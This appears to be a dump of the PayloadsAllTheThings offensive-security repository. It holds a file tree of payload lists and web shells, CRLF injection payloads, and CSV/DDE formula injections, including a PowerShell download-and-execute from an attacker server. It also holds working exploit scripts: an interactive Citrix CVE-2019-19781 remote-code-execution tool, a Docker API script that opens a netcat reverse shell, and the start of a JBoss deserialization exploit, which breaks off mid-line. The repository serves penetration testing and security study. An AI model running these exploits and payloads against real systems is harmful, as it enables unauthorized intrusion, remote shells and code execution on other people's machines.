├── .github ├── FUNDING.yml └── banner.png ├── .gitignore ├── API Key Leaks └── README.md ├── AWS Amazon Bucket S3 └── README.md ├── Account Takeover └── README.md ├── BOOKS.md ├── CONTRIBUTING.md ├── CORS Misconfiguration └── README.md ├── CRLF Injection ├── README.md └── crlfinjection.txt ├── CSRF Injection ├── Images │ └── CSRF-CheatSheet.png └── README.md ├── CSV Injection └── README.md ├── CVE Exploits ├── Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py ├── Apache Struts 2 CVE-2017-9805.py ├── Apache Struts 2 CVE-2018-11776.py ├── Citrix CVE-2019-19781.py ├── Docker API RCE.py ├── Drupalgeddon2 CVE-2018-7600.rb ├── Heartbleed CVE-2014-0160.py ├── JBoss CVE-2015-7501.py ├── Jenkins CVE-2015-8103.py ├── Jenkins CVE-2016-0792.py ├── Jenkins Groovy Console.py ├── README.md ├── Rails CVE-2019-5420.rb ├── Shellshock CVE-2014-6271.py ├── Telerik CVE-2017-9248.py ├── Telerik CVE-2019-18935.py ├── Tomcat CVE-2017-12617.py ├── WebLogic CVE-2016-3510.py ├── WebLogic CVE-2017-10271.py ├── WebLogic CVE-2018-2894.py ├── WebSphere CVE-2015-7450.py └── vBulletin RCE 5.0.0 - 5.5.4.sh ├── Command Injection ├── Intruder │ ├── command-execution-unix.txt │ └── command_exec.txt └── README.md ├── Directory Traversal ├── Intruder │ ├── deep_traversal.txt │ ├── directory_traversal.txt │ ├── dotdotpwn.txt │ └── traversals-8-deep-exotic-encoding.txt └── README.md ├── File Inclusion ├── Intruders │ ├── BSD-files.txt │ ├── JHADDIX_LFI.txt │ ├── LFI-FD-check.txt │ ├── LFI-WindowsFileCheck.txt │ ├── Linux-files.txt │ ├── List_Of_File_To_Include.txt │ ├── List_Of_File_To_Include_NullByteAdded.txt │ ├── Mac-files.txt │ ├── Traversal.txt │ ├── Web-files.txt │ ├── Windows-files.txt │ ├── dot-slash-PathTraversal_and_LFI_pairing.txt │ └── simple-check.txt ├── README.md ├── phpinfolfi.py └── uploadlfi.py ├── GraphQL Injection ├── Images │ └── htb-help.png └── README.md ├── HTTP Parameter Pollution └── README.md ├── Insecure Deserialization ├── Files │ ├── PHP-Serialization-RCE-Exploit.php │ └── Ruby_universal_gadget_generate_verify.rb ├── Java.md ├── PHP.md ├── Python.md ├── README.md └── Ruby.md ├── Insecure Direct Object References ├── Images │ └── idor.png └── README.md ├── Insecure Management Interface ├── Intruder │ └── springboot_actuator.txt └── README.md ├── Insecure Source Code Management └── README.md ├── JSON Web Token └── README.md ├── Kubernetes └── readme.md ├── LDAP Injection ├── Intruder │ ├── LDAP_FUZZ.txt │ └── LDAP_attributes.txt └── README.md ├── LICENSE ├── LaTeX Injection └── README.md ├── Methodology and Resources ├── Active Directory Attack.md ├── Bind Shell Cheatsheet.md ├── Cloud - AWS Pentest.md ├── Cloud - Azure Pentest.md ├── Cobalt Strike - Cheatsheet.md ├── Container - Docker Pentest.md ├── Escape Breakout.md ├── Linux - Persistence.md ├── Linux - Privilege Escalation.md ├── MSSQL Server - Cheatsheet.md ├── Metasploit - Cheatsheet.md ├── Methodology and enumeration.md ├── Miscellaneous - Tricks.md ├── Network Discovery.md ├── Network Pivoting Techniques.md ├── Office - Attacks.md ├── Reverse Shell Cheatsheet.md ├── Subdomains Enumeration.md ├── Windows - AMSI Bypass.md ├── Windows - Download and Execute.md ├── Windows - Mimikatz.md ├── Windows - Persistence.md ├── Windows - Post Exploitation Koadic.md ├── Windows - Privilege Escalation.md └── Windows - Using credentials.md ├── NoSQL Injection ├── Intruder │ └── NoSQL.txt └── README.md ├── OAuth └── README.md ├── Open Redirect ├── Intruder │ ├── Open-Redirect-payloads.txt │ ├── open_redirect_wordlist.txt │ └── openredirects.txt └── README.md ├── README.md ├── Race Condition └── README.md ├── Request Smuggling └── README.md ├── SAML Injection ├── Images │ ├── SAML-xml-flaw.png │ └── XSLT1.jpg └── README.md ├── SQL Injection ├── Cassandra Injection.md ├── HQL Injection.md ├── Images │ ├── PostgreSQL_cmd_exec.png │ ├── Unicode_SQL_injection.png │ └── wildcard_underscore.jpg ├── Intruder │ ├── Auth_Bypass.txt │ ├── Auth_Bypass2.txt │ ├── FUZZDB_MSSQL-WHERE_Time.txt │ ├── FUZZDB_MSSQL.txt │ ├── FUZZDB_MSSQL_Enumeration.txt │ ├── FUZZDB_MYSQL.txt │ ├── FUZZDB_MySQL-WHERE_Time.txt │ ├── FUZZDB_MySQL_ReadLocalFiles.txt │ ├── FUZZDB_Oracle.txt │ ├── FUZZDB_Postgres_Enumeration.txt │ ├── Generic_ErrorBased.txt │ ├── Generic_Fuzz.txt │ ├── Generic_TimeBased.txt │ ├── Generic_UnionSelect.txt │ ├── SQL-Injection │ ├── SQLi_Polyglots.txt │ ├── payloads-sql-blind-MSSQL-INSERT │ ├── payloads-sql-blind-MSSQL-WHERE │ ├── payloads-sql-blind-MySQL-INSERT │ ├── payloads-sql-blind-MySQL-ORDER_BY │ └── payloads-sql-blind-MySQL-WHERE ├── MSSQL Injection.md ├── MySQL Injection.md ├── OracleSQL Injection.md ├── PostgreSQL Injection.md ├── README.md └── SQLite Injection.md ├── Server Side Request Forgery ├── Files │ ├── SSRF_expect.svg │ ├── SSRF_url.svg │ ├── ip.py │ ├── ssrf_ffmpeg.avi │ ├── ssrf_iframe.svg │ ├── ssrf_svg_css_import.svg │ ├── ssrf_svg_css_link.svg │ ├── ssrf_svg_css_xmlstylesheet.svg │ ├── ssrf_svg_image.svg │ └── ssrf_svg_use.svg ├── Images │ ├── Parser & Curl < 7.54.png │ ├── SSRF_PDF.png │ ├── SSRF_Parser.png │ ├── SSRF_stream.png │ ├── WeakParser.jpg │ └── aws-cli.jpg └── README.md ├── Server Side Template Injection ├── Images │ └── serverside.png ├── Intruder │ └── ssti.fuzz └── README.md ├── TWITTER.md ├── Tabnabbing └── README.md ├── Type Juggling └── README.md ├── Upload Insecure Files ├── CVE Ffmpeg HLS │ ├── README.md │ ├── gen_avi_bypass.py │ ├── gen_xbin_avi.py │ ├── read_passwd.avi │ ├── read_passwd_bypass.mp4 │ ├── read_shadow.avi │ └── read_shadow_bypass.mp4 ├── CVE ZIP Symbolic Link │ ├── etc_passwd.zip │ ├── generate.sh │ └── passwd ├── Configuration Apache .htaccess │ ├── .htaccess │ ├── .htaccess_phpinfo │ ├── .htaccess_shell │ └── README.md ├── Configuration Busybox httpd.conf │ ├── README.md │ ├── httpd.conf │ └── shellymcshellface.sh ├── Configuration IIS web.config │ ├── web.config │ └── web.web.config ├── Configuration Python __init__.py │ ├── python-admin-__init__.py.zip │ ├── python-conf-__init__.py.zip │ ├── python-config-__init__.py.zip │ ├── python-controllers-__init__.py.zip │ ├── python-generate-init.py │ ├── python-login-__init__.py.zip │ ├── python-models-__init__.py.zip │ ├── python-modules-__init__.py.zip │ ├── python-scripts-__init__.py.zip │ ├── python-settings-__init__.py.zip │ ├── python-tests-__init__.py.zip │ ├── python-urls-__init__.py.zip │ ├── python-utils-__init__.py.zip │ └── python-view-__init__.py.zip ├── EICAR │ └── eicar.txt ├── Extension ASP │ ├── shell.asa │ ├── shell.ashx │ ├── shell.asmx │ ├── shell.asp │ ├── shell.aspx │ ├── shell.cer │ └── shell.xamlx ├── Extension Flash │ ├── README.md │ ├── xss.swf │ └── xssproject.swf ├── Extension HTML │ └── xss.html ├── Extension PDF JS │ ├── poc.js │ ├── poc.py │ └── result.pdf ├── Extension PHP │ ├── extensions.lst │ ├── phpinfo.jpg.php │ ├── phpinfo.phar │ ├── phpinfo.php │ ├── phpinfo.php3 │ ├── phpinfo.php4 │ ├── phpinfo.php5 │ ├── phpinfo.php7 │ ├── phpinfo.phpt │ ├── phpinfo.pht │ ├── phpinfo.phtml │ ├── shell.gif?shell.php │ ├── shell.jpeg.php │ ├── shell.jpg.php │ ├── shell.jpg?shell.php │ ├── shell.pgif │ ├── shell.phar │ ├── shell.php │ ├── shell.php3 │ ├── shell.php4 │ ├── shell.php5 │ ├── shell.php7 │ ├── shell.phpt │ ├── shell.pht │ ├── shell.phtml │ ├── shell.png.php │ └── shell.png?shell.php ├── Picture Image Magik │ ├── README.md │ ├── convert_local_etc_passwd.svg │ ├── convert_local_etc_passwd_html.svg │ ├── ghostscript_rce_curl.jpg │ ├── imagemagik_ghostscript_cmd_exec.pdf │ ├── imagemagik_ghostscript_reverse_shell.jpg │ ├── imagetragik1_payload_imageover_file_exfiltration_pangu_wrapper.jpg │ ├── imagetragik1_payload_imageover_file_exfiltration_text_wrapper.jpg │ ├── imagetragik1_payload_imageover_reverse_shell_devtcp.jpg │ ├── imagetragik1_payload_imageover_reverse_shell_netcat_fifo.png │ ├── imagetragik1_payload_imageover_wget.gif │ ├── imagetragik1_payload_url_bind_shell_nc.mvg │ ├── imagetragik1_payload_url_curl.png │ ├── imagetragik1_payload_url_portscan.jpg │ ├── imagetragik1_payload_url_remote_connection.mvg │ ├── imagetragik1_payload_url_reverse_shell_bash.mvg │ ├── imagetragik1_payload_url_touch.jpg │ ├── imagetragik1_payload_xml_reverse_shell_nctraditional.xml │ ├── imagetragik1_payload_xml_reverse_shell_netcat_encoded.xml │ ├── imagetragik2_burpcollaborator_passwd.jpg │ ├── imagetragik2_centos_id.jpg │ ├── imagetragik2_ubuntu_id.jpg │ ├── imagetragik2_ubuntu_shell.jpg │ └── imagetragik2_ubuntu_shell2.jpg ├── Picture Metadata │ ├── Build_image_to_LFI.py │ ├── PHP_exif_phpinfo.jpg │ ├── PHP_exif_system.gif │ ├── PHP_exif_system.jpg │ └── PHP_exif_system.png ├── Picture Resize │ ├── GIF_exploit.gif │ ├── JPG_exploit-55.jpg │ ├── PNG_110x110_resize_bypass_use_LFI.png │ ├── PNG_32x32_resize_bypass_use_LFI.png │ ├── README.txt │ ├── exploit_JPG.py │ └── exploit_PNG_110x110.php ├── README.md ├── Server Side Include │ ├── exec.shtml │ ├── include.shtml │ └── index.stm └── Zip Slip │ └── README.md ├── Web Cache Deception ├── Intruders │ └── param_miner_lowercase_headers.txt └── README.md ├── Web Sockets ├── Files │ └── ws-harness.py ├── Images │ ├── WebsocketHarness.jpg │ ├── sqlmap.png │ └── websocket-harness-start.png └── README.md ├── XPATH Injection └── README.md ├── XSLT Injection └── README.md ├── XSS Injection ├── Files │ ├── "> │ ├── '> │ ├── InsecureFlashFile.swf │ ├── JupyterNotebookXSS.ipynb │ ├── SVG_XSS.svg │ ├── SVG_XSS1.svg │ ├── SVG_XSS2.svg │ ├── SVG_XSS3.svg │ ├── SWF_XSS.swf │ ├── mouseover-xss-ecs.jpeg │ ├── onclick-xss-ecs.jpeg │ ├── payload_in_all_known_exif_corrupted.jpg │ ├── payload_in_all_known_exif_corrupted.png │ ├── payload_in_all_known_metadata.jpg │ ├── payload_in_all_known_metadata.png │ ├── payload_text_xss.png │ ├── xml.xsd │ ├── xss.cer │ ├── xss.dtd │ ├── xss.htm │ ├── xss.html.demo │ ├── xss.hxt │ ├── xss.mno │ ├── xss.rdf │ ├── xss.svgz │ ├── xss.url.url │ ├── xss.vml │ ├── xss.wsdl │ ├── xss.xht │ ├── xss.xhtml │ ├── xss.xml │ ├── xss.xsd │ ├── xss.xsf │ ├── xss.xsl │ ├── xss.xslt │ ├── xss_comment_exif_metadata_double_quote.png │ └── xss_comment_exif_metadata_single_quote.png ├── Images │ └── DwrkbH1VAAErOI2.jpg ├── Intruders │ ├── 0xcela_event_handlers.txt │ ├── BRUTELOGIC-XSS-JS.txt │ ├── BRUTELOGIC-XSS-STRINGS.txt │ ├── IntrudersXSS.txt │ ├── JHADDIX_XSS.txt │ ├── MarioXSSVectors.txt │ ├── RSNAKE_XSS.txt │ ├── XSSDetection.txt │ ├── XSS_Polyglots.txt │ ├── jsonp_endpoint.txt │ ├── xss_alert.txt │ ├── xss_payloads_quick.txt │ └── xss_swf_fuzz.txt ├── README.md ├── XSS in Angular.md └── XSS with Relative Path Overwrite.md ├── XXE Injection ├── Files │ ├── Classic XXE - etc passwd.xml │ ├── Classic XXE B64 Encoded.xml │ ├── Classic XXE.xml │ ├── Deny Of Service - Billion Laugh Attack │ ├── XXE OOB Attack (Yunusov, 2013).xml │ └── XXE PHP Wrapper.xml ├── Intruders │ ├── XXE_Fuzzing.txt │ └── xml-attacks.txt └── README.md ├── YOUTUBE.md └── _template_vuln └── README.md /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | 3 | github: swisskyrepo 4 | ko_fi: swissky # Replace with a single Ko-fi username 5 | custom: https://www.buymeacoffee.com/swissky 6 | -------------------------------------------------------------------------------- /.github/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/.github/banner.png -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | BuildPDF/ 2 | .vscode 3 | .todo 4 | AWS Amazon Lambda/ -------------------------------------------------------------------------------- /BOOKS.md: -------------------------------------------------------------------------------- 1 | # Book's list 2 | 3 | Grab a book and relax, these ones are the best security books (in my opinion). 4 | 5 | - [Web Hacking 101](https://leanpub.com/web-hacking-101) 6 | - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec) 7 | - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project) 8 | - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn) 9 | - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa) 10 | - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD) 11 | - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE) 12 | - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900) 13 | - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit) 14 | - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html) 15 | - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html) 16 | - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html) 17 | - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html) 18 | - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html) 19 | - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html) 20 | - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html) 21 | - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html) 22 | - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking) 23 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # CONTRIBUTING 2 | 3 | PayloadsAllTheThings' Team :heart: pull requests :) 4 | Feel free to improve with your payloads and techniques ! 5 | 6 | You can also contribute with a :beers: IRL, or using the sponsor button. 7 | 8 | ## Techniques Folder 9 | 10 | Every section should contains the following files, you can use the `_template_vuln` folder to create a new technique folder: 11 | 12 | - README.md - vulnerability description and how to exploit it, including several payloads, more below 13 | - Intruder - a set of files to give to Burp Intruder 14 | - Images - pictures for the README.md 15 | - Files - some files referenced in the README.md 16 | 17 | ## README.md format 18 | 19 | Use the following example to create a new technique `README.md` file. 20 | 21 | ```markdown 22 | # Vulnerability Title 23 | 24 | > Vulnerability description 25 | 26 | ## Summary 27 | 28 | * [Tools](#tools) 29 | * [Something](#something) 30 | * [Subentry 1](#sub1) 31 | * [Subentry 2](#sub2) 32 | * [References](#references) 33 | 34 | ## Tools 35 | 36 | - [Tool 1](https://example.com) 37 | - [Tool 2](https://example.com) 38 | 39 | ## Something 40 | 41 | Quick explanation 42 | 43 | ## References 44 | 45 | - [Blog title - Author, Date](https://example.com) 46 | ``` 47 | -------------------------------------------------------------------------------- /CRLF Injection/README.md: -------------------------------------------------------------------------------- 1 | # CRLF 2 | 3 | >The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line. 4 | 5 | >A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL. 6 | 7 | ## Summary 8 | 9 | - [CRLF - Add a cookie](#crlf---add-a-cookie) 10 | - [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass) 11 | - [CRLF - Write HTML](#crlf---write-html) 12 | - [CRLF - Filter Bypass](#crlf---filter-bypass) 13 | - [References](#references) 14 | 15 | ## CRLF - Add a cookie 16 | 17 | Requested page 18 | 19 | ```http 20 | http://www.example.net/%0D%0ASet-Cookie:mycookie=myvalue 21 | ``` 22 | 23 | HTTP Response 24 | 25 | ```http 26 | Connection: keep-alive 27 | Content-Length: 178 28 | Content-Type: text/html 29 | Date: Mon, 09 May 2016 14:47:29 GMT 30 | Location: https://www.example.net/[INJECTION STARTS HERE] 31 | Set-Cookie: mycookie=myvalue 32 | X-Frame-Options: SAMEORIGIN 33 | X-Sucuri-ID: 15016 34 | x-content-type-options: nosniff 35 | x-xss-protection: 1; mode=block 36 | ``` 37 | 38 | ## CRLF - Add a cookie - XSS Bypass 39 | 40 | Requested page 41 | 42 | ```powershell 43 | http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a%0d%0a0%0d%0a/%2f%2e%2e 44 | ``` 45 | 46 | HTTP Response 47 | 48 | ```http 49 | HTTP/1.1 200 OK 50 | Date: Tue, 20 Dec 2016 14:34:03 GMT 51 | Content-Type: text/html; charset=utf-8 52 | Content-Length: 22907 53 | Connection: close 54 | X-Frame-Options: SAMEORIGIN 55 | Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT 56 | ETag: "842fe-597b-54415a5c97a80" 57 | Vary: Accept-Encoding 58 | X-UA-Compatible: IE=edge 59 | Server: NetDNA-cache/2.2 60 | Link: 66 | 0 67 | ``` 68 | 69 | ## CRLF - Write HTML 70 | 71 | Requested page 72 | 73 | ```http 74 | http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E 75 | ``` 76 | 77 | HTTP response 78 | 79 | ```http 80 | Set-Cookie:en 81 | Content-Length: 0 82 | 83 | HTTP/1.1 200 OK 84 | Content-Type: text/html 85 | Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT 86 | Content-Length: 34 87 | 88 | You have been Phished 89 | ``` 90 | 91 | ## CRLF - Filter Bypass 92 | 93 | Using UTF-8 encoding 94 | 95 | ```http 96 | %E5%98%8A%E5%98%8Dcontent-type:text/html%E5%98%8A%E5%98%8Dlocation:%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE 97 | ``` 98 | 99 | Remainder: 100 | 101 | * %E5%98%8A = %0A = \u560a 102 | * %E5%98%8D = %0D = \u560d 103 | * %E5%98%BE = %3E = \u563e (>) 104 | * %E5%98%BC = %3C = \u563c (<) 105 | 106 | 107 | ## Exploitation Tricks 108 | * Try to search for parameters that lead to redirects and fuzz them 109 | * Also test the mobile version of the website, sometimes it is different or uses a different backend 110 | 111 | ## References 112 | 113 | * https://www.owasp.org/index.php/CRLF_Injection 114 | * https://vulners.com/hackerone/H1:192749 115 | -------------------------------------------------------------------------------- /CRLF Injection/crlfinjection.txt: -------------------------------------------------------------------------------- 1 | /%%0a0aSet-Cookie:crlf=injection 2 | /%0aSet-Cookie:crlf=injection 3 | /%0d%0aSet-Cookie:crlf=injection 4 | /%0dSet-Cookie:crlf=injection 5 | /%23%0aSet-Cookie:crlf=injection 6 | /%23%0d%0aSet-Cookie:crlf=injection 7 | /%23%0dSet-Cookie:crlf=injection 8 | /%25%30%61Set-Cookie:crlf=injection 9 | /%25%30aSet-Cookie:crlf=injection 10 | /%250aSet-Cookie:crlf=injection 11 | /%25250aSet-Cookie:crlf=injection 12 | /%2e%2e%2f%0d%0aSet-Cookie:crlf=injection 13 | /%2f%2e%2e%0d%0aSet-Cookie:crlf=injection 14 | /%2F..%0d%0aSet-Cookie:crlf=injection 15 | /%3f%0d%0aSet-Cookie:crlf=injection 16 | /%3f%0dSet-Cookie:crlf=injection 17 | /%u000aSet-Cookie:crlf=injection 18 | -------------------------------------------------------------------------------- /CSRF Injection/Images/CSRF-CheatSheet.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0dayCTF/PayloadsAllTheThings/ba2c02cc3ef3f63df6351aa55509bdac137fb3b8/CSRF Injection/Images/CSRF-CheatSheet.png -------------------------------------------------------------------------------- /CSV Injection/README.md: -------------------------------------------------------------------------------- 1 | # CSV Injection (Formula Injection) 2 | 3 | Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. 4 | 5 | ## Exploit 6 | 7 | Basic exploit with Dynamic Data Exchange 8 | 9 | ```powershell 10 | # pop a calc 11 | DDE ("cmd";"/C calc";"!A0")A0 12 | @SUM(1+1)*cmd|' /C calc'!A0 13 | =2+5+cmd|' /C calc'!A0 14 | 15 | # pop a notepad 16 | =cmd|' /C notepad'!'A1' 17 | 18 | # powershell download and execute 19 | =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 20 | 21 | # msf smb delivery with rundll32 22 | =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 23 | 24 | # Prefix obfuscation and command chaining 25 | =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A 26 | =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A 27 | +thespanishinquisition(cmd|'/c calc.exe'!A 28 | = cmd|'/c calc.exe'!A 29 | 30 | # Using rundll32 instead of cmd 31 | =rundll32|'URL.dll,OpenURL calc.exe'!A 32 | =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A 33 | 34 | # Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. 35 | = C m D | '/ c c al c . e x e ' ! A 36 | 37 | ``` 38 | 39 | Technical Details of the above payload: 40 | 41 | - `cmd` is the name the server can respond to whenever a client is trying to access the server 42 | - `/C` calc is the file name which in our case is the calc(i.e the calc.exe) 43 | - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data 44 | 45 | Any formula can be started with 46 | 47 | ```powershell 48 | = 49 | + 50 | – 51 | @ 52 | ``` 53 | 54 | ## References 55 | 56 | * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection) 57 | * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection) 58 | * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/) 59 | * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/) 60 | * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/) 61 | * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf) 62 | * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html) 63 | * [Three New DDE Obfuscation Methods](https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation) 64 | -------------------------------------------------------------------------------- /CVE Exploits/Citrix CVE-2019-19781.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # https://github.com/mpgn/CVE-2019-19781 3 | # # # 4 | 5 | import requests 6 | import string 7 | import random 8 | import re 9 | import sys 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | 13 | print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway") 14 | print("Found by Mikhail Klyuchnikov") 15 | print("") 16 | 17 | if len(sys.argv) < 2: 18 | print("[-] No URL provided") 19 | sys.exit(0) 20 | 21 | while True: 22 | try: 23 | command = input("command > ") 24 | 25 | random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12)) 26 | print("[+] Adding bookmark", random_xml + ".xml") 27 | 28 | burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl" 29 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 30 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 31 | burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"} 32 | r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False) 33 | 34 | if r.status_code == 200: 35 | print("[+] Bookmark added") 36 | else: 37 | print("\n[-] Target not vulnerable or something went wrong") 38 | sys.exit(0) 39 | 40 | burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml" 41 | burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" + 42 | random_xml, "NSC_NONCE": "c", "Connection": "close"} 43 | r = requests.get(burp0_url, headers=burp0_headers,verify=False) 44 | 45 | replaced = re.sub('^&#.* $', '', r.text, flags=re.MULTILINE) 46 | print("[+] Result of the command: \n") 47 | print(replaced) 48 | 49 | except KeyboardInterrupt: 50 | print("Exiting...") 51 | break -------------------------------------------------------------------------------- /CVE Exploits/Docker API RCE.py: -------------------------------------------------------------------------------- 1 | from __future__ import print_function 2 | import requests 3 | import logging 4 | import json 5 | import urllib.parse 6 | 7 | # NOTE 8 | # Enable Remote API with the following command 9 | # /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock 10 | # This is an intended feature, remember to filter the port 2375.. 11 | 12 | name = "docker" 13 | description = "Docker RCE via Open Docker API on port 2375" 14 | author = "Swissky" 15 | 16 | # Step 1 - Extract id and name from each container 17 | ip = "127.0.0.1" 18 | port = "2375" 19 | data = "containers/json" 20 | url = "http://{}:{}/{}".format(ip, port, data) 21 | r = requests.get(url) 22 | 23 | if r.json: 24 | for container in r.json(): 25 | container_id = container['Id'] 26 | container_name = container['Names'][0].replace('/','') 27 | print((container_id, container_name)) 28 | 29 | # Step 2 - Prepare command 30 | cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]' 31 | data = "containers/{}/exec".format(container_name) 32 | url = "http://{}:{}/{}".format(ip, port, data) 33 | post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }' 34 | post_header = { 35 | "Content-Type": "application/json" 36 | } 37 | r = requests.post(url, json=json.loads(post_json)) 38 | 39 | 40 | # Step 3 - Execute command 41 | id_cmd = r.json()['Id'] 42 | data = "exec/{}/start".format(id_cmd) 43 | url = "http://{}:{}/{}".format(ip, port, data) 44 | post_json = '{ "Detach":false,"Tty":false}' 45 | post_header = { 46 | "Content-Type": "application/json" 47 | } 48 | r = requests.post(url, json=json.loads(post_json)) 49 | print(r) -------------------------------------------------------------------------------- /CVE Exploits/JBoss CVE-2015-7501.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python2 2 | 3 | # Jboss Java Deserialization RCE (CVE-2015-7501) 4 | # Made with <3 by @byt3bl33d3r 5 | 6 | from __future__ import print_function 7 | import requests 8 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 9 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 10 | 11 | import argparse 12 | import sys, os 13 | #from binascii import hexlify, unhexlify 14 | from subprocess import check_output 15 | 16 | ysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar'] 17 | ysoserial_path = None 18 | 19 | parser = argparse.ArgumentParser() 20 | parser.add_argument('target', type=str, help='Target IP') 21 | parser.add_argument('command', type=str, help='Command to run on target') 22 | parser.add_argument('--proto', choices={'http', 'https'}, default='http', help='Send exploit over http or https (default: http)') 23 | parser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)') 24 | 25 | if len(sys.argv) < 2: 26 | parser.print_help() 27 | sys.exit(1) 28 | 29 | args = parser.parse_args() 30 | 31 | if not args.ysoserial_path: 32 | for path in ysoserial_default_paths: 33 | if os.path.exists(path): 34 | ysoserial_path = path 35 | else: 36 | if os.path.exists(args.ysoserial_path): 37 | ysoserial_path = args.ysoserial_path 38 | 39 | if ysoserial_path is None: 40 | print('[-] Could not find ysoserial JAR file') 41 | sys.exit(1) 42 | 43 | if len(args.target.split(":")) != 2: 44 | 